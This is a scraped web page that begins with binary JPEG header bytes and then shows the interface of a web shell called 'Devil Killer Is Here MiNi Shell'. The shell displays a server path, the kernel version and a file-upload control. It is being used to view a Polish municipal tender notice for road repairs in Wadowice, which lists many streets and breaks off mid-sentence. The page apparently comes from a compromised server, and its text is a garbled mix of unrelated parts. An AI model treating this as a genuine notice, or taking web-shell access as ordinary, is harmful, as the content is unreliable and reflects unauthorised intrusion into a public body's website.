JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230602/0024569601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty cząstkowe dróg gminnych i powiatowych zarządzanych przez Gminę Wadowice w roku 2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wadowice - Urząd Miejski w Wadowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000526423</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pl. Jana Pawła II 23</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wadowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wadowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wadowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty cząstkowe dróg gminnych i powiatowych zarządzanych przez Gminę Wadowice w roku 2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-13be06e0-0131-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00245696</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00038531/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.15 Remont cząstkowy dróg gminnych i powiatowych zarządzanych przez Gminę Wadowice w roku 2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-13be06e0-0131-11ee-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym<br/>a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl oraz<br/>za pomocą poczty elektronicznej,<br/>e-mail: zamowienia@wadowice.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie<br/>eZamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy<br/>eZamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>2. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 25 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie<br/>o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1) administratorem danych zbieranych i przetwarzanych w celu prowadzenia postępowania, zawarcia umowy oraz realizacji umowy<br/>jest Burmistrz Wadowic, Urząd Miejski w Wadowicach, Plac Jana Pawła II 23, 34-100 Wadowice, tel. 33 873 18 11, e-mail:<br/>um@wadowice.pl<br/>2) dane kontaktowe do Inspektora Ochrony Danych: Urząd Miejski w Wadowicach, Pl. Jana Pawła II 23, 34-100 Wadowice, tel. 33<br/>873 18 11, e-mail: iod@wadowice.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit.c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego;<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>art.18 oraz art.74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2022r. poz.1710 z późn.zm.), dalej<br/>„ustawa Pzp”;<br/>5) dane osobowe będą przechowywane, zgodnie z art.78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; ewentualne konsekwencje niepodania określonych danych osobowych wynikają z ustawy<br/>Pzp;<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, w tym nie będą profilowane,<br/>stosowanie do art.22 RODO;<br/>8) w związku z przetwarzaniem danych osobowych przysługują następujące prawa:<br/>− prawo dostępu do treści swoich danych (art.15 RODO);<br/>− prawo do sprostowania swoich danych osobowych (art.16 RODO); jednocześnie skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>− prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO (art.77 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.42.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - Zakres I: naprawę miejsc uszkodzonych w nawierzchniach asfaltowych wg technologii pełnej „A”, technologii uproszczonej „B”, a także powierzchniowe utrwalenie nawierzchni asfaltowej oraz regulację studzienek na ulicach miejskich (powiatowych <br/>i gminnych) w Wadowicach: ul. 12 Pułku Piechoty; ul. Ady Sari; ul. Bałysa; ul. Barska; <br/>ul. Baśniowa; ul. Batorego; ul. Beskidzka; ul. Błonie; pl. Bohaterów Getta; ul. Bohaterów Monte Cassino; ul. Brzozowa; ul. Chopina; ul. Cicha; ul. Doktora Edmunda Wojtyły; <br/>ul. Emilii i Karola Wojtyłów; ul. Energetyków; ul. Fabryczna; rondo Generała Leopolda Okulickiego; ul. Gimnazjalna; ul. Gotowizna; ul. Graniczna; ul. Groble; ul. Iwańskiego; <br/>ul. Jagiellońska; ul. Jana III Sobieskiego; pl. Jana Pawła II; ul. Janiny Brzostowskiej; <br/>ul. Jasna; ul.Jaśminowa; ul. Jaworowa; os. Jedność; os. Jesionowe; ul. Kalinowa; <br/>ul. Karmelicka; ul. Kasztanowa; ul. Klonowa; ul. Kochanowskiego; ul. Konstytucji 3 Maja; os. Kopernika; ul. Kościelna; pl. Kościuszki; ul. Krakowska; ul. Krasińskiego; ul. Krótka; <br/>ul. Kwiatowa; ul. Legionów; ul. Leszczynowa; ul. Leśna; ul. Lipowa; ul. Lwowska; <br/>ul. Łazówka; os. Łąki; ul. M. Wadowity; ul. marsz. Józefa Piłsudskiego; ul. Matejki; al. Matki Bożej Fatimskiej; ul. Mickiewicza; ul. Miedzne; park Miejski; ul. Młyńska; ul. Mydlarska; <br/>ul. Nadbrzeżna; ul. Niecała; ul. Niwy; pl. Obrońców Westerplatte; ul. Olbrychta; <br/>ul. Parkowa; ul. Piaskowa; os. Piastowskie; pl. Plac M. Kopernika; pl. Plac Solidarności; <br/>os. Pod Skarpą; ul. Podgórska; ul. Podmiejska; ul. Podstawie; ul. Pogodna, ul. Polna; <br/>ul. Poprzeczna; ul. prof. Nikliborca; ul. Pułaskiego; ul. Rodziny Nowobilskich; ul. Sadowa; ul. Sienkiewicza; ul. Sikorskiego; os. Słoneczne; ul. Słowackiego; ul. Sosnowa; <br/>ul. Spadzista; ul. Spokojna; ul. Sportowców; ul. Spółdzielców; ul. Szkolna; ul. Szpitalna; <br/>ul. Świerkowa; ul. Tatrzańska; ul. Teatralna; ul. Topolowa; ul. Trybunalska; os. Wadowity; ul. Wałowa; ul. Wąska; ul. Wenecja; ul. Widok; ul. Wiosenna; ul. Wiśniowa; ul. Wojska Polskiego; al. Wolności; ul. Wowry; os. XX-lecia ; ul. Zaskawie; ul. Zatorska; ul. Zielona; <br/>ul. Zygmunta I Starego; ul. Źródlana; ul. Żeromskiego; ul. Żwirki i Wigury </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustaw Pzp. Udzielanie zamówień będzie polegać<br/>na powtórzeniu tych samych robót budowlanych, które są przedmiotem zamówienia podstawowego w zakresie do 80 % wartości<br/>zamówienia podstawowego określonej w umowie. Zamówienie zostanie udzielone po przeprowadzeniu negocjacji z Wykonawcą i<br/>zawarciu umowy .</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uważać się będzie ofertę, która<br/>uzyskała największą ilość punktów w oparciu o ustalone kryteria, według wzoru:<br/>P = C+R</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – drogi gminne i wewnętrzne na terenie Sołectw<br/>Część II - Zakres II: naprawę miejsc uszkodzonych w nawierzchniach asfaltowych przy użyciu remontera, emulsją asfaltową modyfikowaną 65% oraz grysami, wg technologii pełnej „A”, technologii uproszczonej „B”, remont cząstkowy nawierzchni tłuczniowych <br/>z zastosowaniem kruszywa łamanego (niesortu porfirowego), remont cząstkowy poboczy dróg kruszywem łamanym (niesortem porfirowym) z zastosowaniem mechanicznej układarki do poboczy, powierzchniowe utrwalenie poboczy emulsją i grysami bazaltowymi mechanicznie z użyciem rozkładarki do grysów i skrapiarki oraz remont cząstkowy odwodnienia dróg poprzez regulację pionową kratek ściekowych ulicznych i włazów kanałowych na drogach wiejskich: <br/>Babica: (ul. Główna, ul. Topolowa, ul. Wiejska, Spokojna, ul. Srebrne Łany, ul. Wierzbowa, ul. Krajobrazowa, ul. Modrzewiowa, ul. Pogodna, ul. Górska, ul. Leszczynowa, ul. Podlesie, ul. Zalesie, ul. Piwoniowa, ul. Spadzista, ul. Klonowa, ul. Akacjowa, ul. Spacerowa); <br/>Barwałd Dolny: (ul. Wadowicka, ul. Wiejska, ul. Spokojna, ul. Kościelna, ul. Długa, <br/>ul. Graniczna, ul. Piaskowa, ul. Parkowa, ul. Górska, ul. Polna, ul. Słoneczna, ul. Widokowa, ul. Kolejowa, ul. Rolna, ul. Łąkowa, ul. Szkolna, ul. Rodzinna);<br/>Chocznia: (Do Gancarza; Graniczna z Zawadką; Os. Baranciak; Os. Komanie; <br/>Os. Malatowskie; Os. Patria; Os. Pod Bliźniakami; Os. Putka; Os. Ramendowskie; Przytnica; Stary Gościniec; ul. Biała Droga; ul. Główna; ul. Góralska; ul. Kościelna; Zarąbki; Zawale;)<br/>Gorzeń Dolny: (ul. Dworkowa, ul. Dzwonek, ul. Osiedlowa, ul. Wspólna, ul. Widokowa, <br/>ul. Cichy kącik);<br/>Gorzeń Górny: (ul. Zakopiańska, ul. Czartak, ul. Bukowa, ul. Krajobrazowa, <br/>ul. Pod Iłowcem, ul. Cedrowa, ul. Magnoliowa, ul. Wadowicka);<br/>Jaroszowice: (ul. Pod Kopcem, ul. Karola Wojtyły, ul. Nad Skawą, ul. Pod Lasem, <br/>ul. Słoneczna, ul. Spacerowa, ul. Dąbie, ul. Biała, ul. Urokliwa, ul. Ogrodowa, <br/>ul. Księżycowa, ul. Gościnna, ul. Niedźwiadek, ul. Wesoła, ul. Strażacka, ul. Zakątek, <br/>ul. Wilczy Dół, ul. Zaułek, ul. Gołębiówka);<br/>Jaroszowice: Zbywaczówka (ul. Zakopiańska, ul. Makowa, ul. Lawendowa, ul. Akacjowa, <br/>ul. Różana, ul. Malinowa, ul. Cyprysowa, ul. Wierzbowa, ul. Krokusowa);<br/>Kaczyna: (ul. Krajobrazowa, ul. Leśna, ul. Górska, ul. Gronik, ul. Pankówka);<br/>Klecza Dolna: (ul. Krakowska, ul. Pniaki, ul. Stryszowska, ul. Brzozowa, ul. Biała Droga, <br/>ul. Nad Wiaduktem, ul. Rogatka, ul. Zielona, ul. Strażacka, ul. Zaszkole, ul. Przy Młynie, <br/>ul. Miodowa, ul. Nowa wieś, ul. Pagórek, ul. Diamentowa, ul. S. Marii Małgorzaty Banaś, <br/>ul. Kasztanowa, ul. Spacerowa, ul. Sosnowa, ul. Gościnna, ul. Lipowa, ul. Szmaragdowa, <br/>ul. Wielka Góra, ul. Malownicza, ul. Niziny, ul. Konwaliowa, ul. Ostrawa, ul. Leśna, <br/>ul. Nad Stawem, ul. Radosna, ul. Pszczela, ul. Beskidzka, ul. Jasna, ul. Manhattan);<br/>Klecza Górna: (ul. Kalwaryjska, ul. Pagórek, ul. Dębowa, ul. Cicha, ul. Wspólna, ul. Zacisze, ul. Pogodna, ul. Zarąbki, ul. Wiązów, ul. Jodłowa, ul. Dworska, ul. Niecała, ul. Podlas, <br/>ul. Sąsiedzka);<br/>Ponikiew: (Na Hutę; Leniówka; Mentylowo; Rzyczkowo; Sasowo; Sikorowo; Sołtysowo);<br/>Roków: (ul. Rokowska, ul. Rekreacyjna, ul. Główna, ul. Cisowa, ul. Rynek, ul. Rola, <br/>ul. Olchowa, ul. Górnica, ul. Okrężna, ul. Łęgi, ul. Rybacka, ul. Urocza, ul. Mostowa, <br/>ul. Orzechowa, ul. Witanowicka);<br/>Stanisław Górny: (ul. Ks. Zygmunta Kuźmy, ul. Sosienki, ul. Dębowa, ul. Zabłocie, <br/>ul. Czerna, ul. Łubianki, ul. Wesoła, ul. Promienna, ul. Pawlikówka, ul. Świętego Floriana, <br/>ul. Za Potokiem, ul. Kalwaryjska, ul. Słodka, ul. Lizarówka); <br/>Wysoka: (ul. Wadowicka, ul. Dział, ul. Słoneczna, ul. Jagodnica, ul. Jesionowa, <br/>ul. Spokojna, ul. Madoniówka, ul. Leśna, ul. Sąsiedzka, ul. Niziny, ul. Przedszkolna, <br/>ul. Krótka, ul. Widokowa, ul. Rzyki, ul. Graniczna, ul. Podgórska, ul. Dworska, ul. Górska, <br/>ul. Zielona, ul. Osiedlowa, ul. Ogrodowa, ul. Krzemionki, ul. Sportowa, ul. Zarzecze, <br/>ul. Spacerowa, ul. Cicha, ul. Polna, ul. Spadzista, ul. Bukowa);<br/>Zawadka: (ul. Górska, ul. Iglasta, ul. Znajomych, ul. Radosna, ul. Św. Jana Nepomucena, ul. Wrzosowa, ul. Imbirowa, ul. Pod Łysą Górą, ul. Pszczelarzy, ul. Malownicza, <br/>ul. Chabrowa, ul. Liliowa, ul. Długa, ul. Konwaliowa, ul. Karmelowa, ul. Pigwowa, <br/>ul. Cynamonowa). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustaw Pzp. Udzielanie zamówień będzie polegać<br/>na powtórzeniu tych samych robót budowlanych, które są przedmiotem zamówienia podstawowego w zakresie do 80 % wartości<br/>zamówienia podstawowego określonej w umowie. Zamówienie zostanie udzielone po przeprowadzeniu negocjacji z Wykonawcą i<br/>zawarciu 